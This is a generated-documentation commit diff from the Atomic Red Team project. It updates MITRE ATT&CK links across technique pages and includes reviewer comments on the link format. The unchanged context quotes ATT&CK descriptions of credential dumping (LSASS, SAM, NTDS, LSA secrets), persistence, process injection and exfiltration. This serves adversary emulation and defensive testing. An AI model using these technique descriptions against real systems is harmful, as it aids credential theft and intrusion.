Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2020-09-29 13:53:28 +00:00
parent 6870ca31c1
commit 910a2a764a
186 changed files with 186 additions and 186 deletions
+1 -1
@@ -1,5 +1,5 @@
# T1003.001 - LSASS Memory
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
<blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
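Review bot: the commit message does not say why the ATT&CK link in every generated file moved from `/wiki/Technique/T1003.001` to `/techniques/T1003/001`; since this is a generator run rather than a hand edit, the message should name the template change that produced it so the 186 identical one-line hunks are traceable. The new form matches the technique links already used inside the quoted description (`https://attack.mitre.org/techniques/T1550`), so the substitution itself looks correct.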
+1 -1
@@ -1,5 +1,5 @@
# T1003.002 - Security Account Manager
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
<blockquote>Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
+1 -1
@@ -1,5 +1,5 @@
# T1003.003 - NTDS
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003.003)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
<blockquote>Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
+1 -1
@@ -1,5 +1,5 @@
# T1003.004 - LSA Secrets
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
<blockquote>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1003 - OS Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
<blockquote>Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
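Review bot: for a parent technique the ID has no dot, so this hunk only changes the path prefix (`/wiki/Technique/T1003` to `/techniques/T1003`), whereas the sub-technique hunks also turn the dot into a slash (`T1003/001`); the generator's tests should cover both shapes so the dot-to-slash mapping is exercised for sub-techniques and shown to be a no-op for parents.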
+1 -1
@@ -1,5 +1,5 @@
# T1007 - System Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1007)
<blockquote>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
## Atomic Tests
+1 -1
@@ -1,5 +1,5 @@
# T1010 - Application Window Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1010)
<blockquote>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</blockquote>
## Atomic Tests
+1 -1
@@ -1,5 +1,5 @@
# T1012 - Query Registry
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1012)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1012)
<blockquote>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1014 - Rootkit
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1014)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1014)
<blockquote>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1016 - System Network Configuration Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1016)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016)
<blockquote>Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1018 - Remote System Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
<blockquote>Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) in order to discover the hostname to IP address mappings of remote systems.
Specific to macOS, the <code>bonjour</code> protocol exists to discover additional Mac-based systems within the same broadcast domain.
+1 -1
@@ -1,5 +1,5 @@
# T1020 - Automated Exfiltration
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1020)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1020)
<blockquote>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1021.001 - Remote Desktop Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1021.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/001)
<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
+1 -1
@@ -1,5 +1,5 @@
# T1021.002 - SMB/Windows Admin Shares
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1021.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/002)
<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
+1 -1
@@ -1,5 +1,5 @@
# T1021.003 - Distributed Component Object Model
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1021.003)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/003)
<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
+1 -1
@@ -1,5 +1,5 @@
# T1021.006 - Windows Remote Management
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1021.006)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/006)
<blockquote>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1027.001 - Binary Padding
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/001)
<blockquote>Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1027.002 - Software Packing
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/002)
<blockquote>Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. </blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1027.004 - Compile After Delivery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/004)
<blockquote>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1027 - Obfuscated Files or Information
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027)
<blockquote>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript.
+1 -1
@@ -1,5 +1,5 @@
# T1030 - Data Transfer Size Limits
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1030)
<blockquote>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</blockquote>
## Atomic Tests
+1 -1
@@ -1,5 +1,5 @@
# T1033 - System Owner/User Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1033)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1033)
<blockquote>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Utilities and commands that acquire this information include <code>whoami</code>. In Mac and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>.</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1036.003 - Rename System Utilities
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036.003)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/003)
<blockquote>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</blockquote>
## Atomic Tests
+1 -1
@@ -1,5 +1,5 @@
# T1036.006 - Space after Filename
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036.006)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/006)
<blockquote>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
+1 -1
@@ -1,5 +1,5 @@
# T1037.001 - Logon Script (Windows)
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/001)
<blockquote>Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1037.002 - Logon Script (Mac)
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/002)
<blockquote>Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)
Adversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. </blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1037.004 - Rc.common
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004)
<blockquote>Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used.
Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence)</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1037.005 - Startup Items
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037.005)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/005)
<blockquote>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, <code>/Library/StartupItems</code> isnt guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.
+1 -1
@@ -1,5 +1,5 @@
# T1040 - Network Sniffing
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1040)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1040)
<blockquote>Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
+1 -1
@@ -1,5 +1,5 @@
# T1046 - Network Service Scanning
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1046)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1046)
<blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1047 - Windows Management Instrumentation
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1047)
<blockquote>Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1048.003 - Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048.003)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1048/003)
<blockquote>Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. </blockquote>
+1 -1
@@ -1,5 +1,5 @@
# T1048 - Exfiltration Over Alternative Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1048)
<blockquote>Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.
+1 -1
@@ -1,5 +1,5 @@
# T1049 - System Network Connections Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1049)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1049)
<blockquote>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
+1 -1
@@ -1,5 +1,5 @@
# T1053.001 - At (Linux)
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.001)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/001)
<blockquote>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)
An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</blockquote>
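Review bot: this hunk shows the sub-technique case, which differs from the parent-technique case above: the heading keeps the dotted ID `T1053.001`, the old link used the dotted form `wiki/Technique/T1053.001`, and the new link uses the slash form `techniques/T1053/001`. Whatever builds these links must therefore rewrite only the sub-technique separator (`T1053.001` to `T1053/001`) and leave parent IDs such as `T1055` untouched; a plain `.`-to-`/` replacement on the ID satisfies both cases. Spot-checking the remaining hunks in this commit, every sub-technique link (`T1055/004`, `T1059/001`, `T1070/006`, and so on) uses the slash form and every parent link keeps the bare ID, so the conversion looks consistent.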
+1 -1
View File
@@ -1,5 +1,5 @@
# T1053.002 - At (Windows)
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.002)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/002)
<blockquote>Adversaries may abuse the <code>at.exe</code> utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
An adversary may use <code>at.exe</code> in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).
+1 -1
View File
@@ -1,5 +1,5 @@
# T1053.003 - Cron
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.003)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/003)
<blockquote>Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code. The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths.
An adversary may use <code>cron</code> in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. <code>cron</code> can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1053.004 - Launchd
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/004)
<blockquote>Adversaries may abuse the <code>Launchd</code> daemon to perform task scheduling for initial or recurring execution of malicious code. The <code>launchd</code> daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).
An adversary may use the <code>launchd</code> daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. <code>launchd</code> can also be abused to run a process under the context of a specified account. Daemons, such as <code>launchd</code>, run with the permissions of the root user account, and will operate regardless of which user account is logged in.</blockquote>
+1 -1
View File
@@ -1,5 +1,5 @@
# T1053.005 - Scheduled Task
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1053.005)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1053/005)
<blockquote>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The <code>schtasks</code> can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.
+1 -1
View File
@@ -1,5 +1,5 @@
# T1055.004 - Asynchronous Procedure Call
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055.004)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/004)
<blockquote>Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.
APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL).
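Review bot: two typos sit in the unchanged context of this hunk, and both come from the upstream ATT&CK description rather than from this change: "when the thread enters an alterable state" should read "alertable state" (user-mode APCs run when the thread performs an alertable wait), and `LoadLibrayA` should be `LoadLibraryA`. Since the text is quoted from ATT&CK, they should be reported upstream rather than patched in this file; a hand edit here would be overwritten by the next generation run.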
+1 -1
View File
@@ -1,5 +1,5 @@
# T1055.012 - Process Hollowing
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1055.012)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/012)
<blockquote>Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.
